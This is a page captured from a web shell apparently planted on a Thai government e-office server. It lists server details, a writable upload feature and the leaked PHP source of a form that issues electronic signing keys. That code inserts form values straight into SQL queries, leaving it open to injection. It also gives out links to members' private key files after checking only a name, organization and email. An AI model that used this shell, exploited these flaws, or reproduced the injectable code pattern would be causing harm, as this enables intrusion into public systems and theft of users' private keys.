MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/application/CA/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/application/CA/requse_key.php
<?
@session_start() ;

require_once "config/config.ini.php";
require_once "common/database.class.php";
include("../../common/CA/class.openssl.php");
$db = new database();
$db->connect();

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title></title>
<style type="text/css">
<!--
body,td,th {
	font-family: Verdana, Geneva, sans-serif;
	font-size: 13px;
}
.red{
	color:#F00;
	}
-->
</style></head>
<style>
	.preload{
	border: 1px solid #999;
	margin: 0px;
	position:relative;
	color: #000;
	background-color: #EFECFF;	
	padding-right: 5px;
	padding-left: 5px;
	padding-top: 2px;
	padding-bottom: 2px;
	
}
.comment{
	color:#F00;
	
	}
</style>
<script language="javascript">

function ValidateDoc()
{   
    var cr        = unescape("\n");
    var ErrorMsg  = "เกิดข้อผิดพลาดดังนี้ :  "+cr+cr;
    var InitLen   = ErrorMsg.length;
    var TheForm   = document.frm1;
	var emailRegEx = /^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i;
	
	   if (TheForm.fname.value.length < 1)
       ErrorMsg =  ErrorMsg + "ไม่ได้กรอก ชื่อ  " + cr;
	   if (TheForm.lname.value.length < 1)
       ErrorMsg =  ErrorMsg + "ไม่ได้กรอก นามสกุล  " + cr;
	if (TheForm.organization.value.length < 1)
       ErrorMsg =  ErrorMsg + "ไม่ได้กรอก ชื่อหน่วยงาน  " + cr;
	
	if (TheForm.email.value.length < 1){
       ErrorMsg =  ErrorMsg + "ไม่ได้กรอก อีเมล์  " + cr;
	   }else{
		if (TheForm.email.value.search(emailRegEx) == -1)
		   ErrorMsg =  ErrorMsg + "อีเมล์ไม่ถูกต้อง " + cr;   
	   }
	  
	 
	if ( ErrorMsg.length > InitLen ){
        alert( ErrorMsg );
        return (false);
    }
    return(true);
}</script>
<body >
<div  style="text-align:center;font-size:16px;font-weight:bold">ดาวน์โหลดกุญแจอิเล็กทรอนิกส์</div><br />
<?

if($_POST[action]=="req"){
$sql="SELECT *  FROM member where  fname='$fname' and  sname='$lname' and  organization_unit='$organization' and LOWER(email)='".strtolower($email)."'";
$rex=$db->query($sql);
$num=$db->numrows($rex);	
$rows = $db->fetch($rex);
$url1 = "getfile.php?filename=".$rows['public_file']."";
$url2 = "getfile.php?filename=".$rows['private_file']."";
$url3 = "getfile.php?filename=".$rows['cer_file']."";
//echo $sql;
if($num==0){
echo "<center><table width=\"600px\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\">
    <tr>
      <td><br><br><div class=\"preload\" style=\"width=300px\">ไม่พบข้อมูลกรุณาตรวจสอบใหม่ <br>
  <a href=\"javascript:history.back()\"> ย้อนกลับ</a><br><br></div><center></td></tr><table>";
}else{
	
		echo"<table width=\"600px\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\">
    <tr>
      <td>
		<div class=\"preload\">
		<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
		<tr>
		<td align=\"left\"><strong >ผลการตรวจสอบ</strong><br>
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ระบบได้ตรวจสอบแล้วพบว่า กุญแจส่วนตัว (Private Key) ของท่านได้ <strong >SERAIL NUMBER:$rows[serial_number]</strong > <br />
		ชื่อที่ใช้ลงทะเบียน: $rows[prename]$rows[fname] $rows[sname] <br />
		กุญแจหมดอายุ: $rows[exp_date]<br />
		<center>
		<span class='comment'>$str</span><br />
		$but
		</center>
		<hr>
		</td>
		</tr>
		<tr>
		<td align=\"left\">ท่านสามารถดาวน์โหลดกุญแจอิเล็กทรอนิกส์ ได้ที่นี้ <br>
		กุญแจสาธารณะ(Public Key):<a target=_blank  href=\"$url1\"' >".$rows['public_file']."</a> || <a target=_blank href=\"$url3\" >".$rows['cer_file']."</a> 
		<br>
		กุญแจส่วนตัว (Private Key):
		<a href=\"$url2\"  target=_blank>".$rows['private_file']."</a>
		</td>
		</tr>
		<tr>
		<td align=\"right\" class=\"comment\">ผู้ขอใช้บริการควรดาวน์โหลด กุญแจอิเล็กทรอนิกส์เก็บไว้ และไม่ควรแจกจ่ายกุญแจส่วนตัว (Private Key) ให้กับผู้อื่น </td>
		</tr>
		<tr>
		<td align=\"center\"></td>
		</tr>
		</table>
		</div></td></tr><table>";
		
		$ip=$_SERVER['REMOTE_ADDR'];		
		$sql="insert ca_reqkey  set 
		staff_id='$_SESSION[session_staffid]',
		email='$email',
		org_name='$organization',
		fname='$fname',
		lname='$lname',
		ip='$ip',
		update_stamp=NOW()";		
       $db->query($sql);
}
/*echo "<pre>";
print_r($_SESSION);*/
die;
}


?>



<form id="frm1" name="frm1" method="post" action="?" onsubmit=" return ValidateDoc();">
<input type="hidden" value="req" name="action" />
  <table width="500" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td>
      <div  class="preload">
      
      <table width="550px" border="0" cellspacing="0" cellpadding="0" >
        <tr>
          <td ><table width="100%" border="0" cellspacing="5" cellpadding="0" style="margin:5px,5px,5px,5px">
            <tr>
              <td colspan="2" align="right" style="font-size:14px"><strong>กรอกข้อมูลขอกุญแจอิเล็กทรอนิกส์ใหม่</strong></td>
            </tr>
            <tr>
              <td width="29%" align="right"><strong>อีเมล์ : </strong></td>
              <td width="71%"><input name="email" type="text" id="email" size="50" maxlength="255" />
                <span class="red">*</span></td>
            </tr>
            <tr>
              <td align="right"><strong>ชื่อหน่วยงาน : </strong></td>
              <td><label>
                <select name="organization" id="organization"  style="width:330px;">
                  <option  value="">เลือกชื่อหน่วยงาน</option>
                  <?
		$sql_office = "SELECT * FROM org_staffgroup WHERE groupname NOT LIKE '%Guest%' AND groupname NOT LIKE '%Administrator%' ORDER BY groupname  ASC"; 
		
		
		$Result_office = mysql_query($sql_office);
		while($rs_of = mysql_fetch_assoc($Result_office)){
			
		$sel=($rs_of[gid]==$_SESSION[session_gid])	?"selected":"";
			
			
			echo "<option value='$rs_of[groupname]' $sel title='$rs_of[groupname]'>$rs_of[groupname]</option>";
		}
		?>
                </select>
                <span class="red">*</span></label></td>
            </tr>
            <tr>
              <td align="right"><strong>ชื่อ : </strong></td>
              <td><input name="fname" type="text" id="fname" size="50" maxlength="255" />                <span class="red">*<br />
ไม่ต้องกรอคำนำหน้า</span></td>
            </tr>
            <tr>
              <td align="right"><strong>นามสกุล : </strong></td>
              <td><input name="lname" type="text" id="lname" size="50" maxlength="255" />
                <span class="red">*</span></td>
            </tr>
            <tr>
              <td align="right">&nbsp;</td>
              <td>&nbsp;</td>
            </tr>
            <tr>
              <td colspan="2" align="center"><input type="submit" name="button" id="button" value="ตกลง"  style="font-size:14px"/>
                <input type="reset" name="button2" id="button2" value="ยกเลิก"  style="font-size:14px"/></td>
            </tr>
            <tr>
              <td align="right">&nbsp;</td>
              <td>&nbsp;</td>
            </tr>
          </table></td>
        </tr>
      </table>
      </div>
      </td>
    </tr>
  </table>
</form>
</body>
</html>

Anon7 - 2021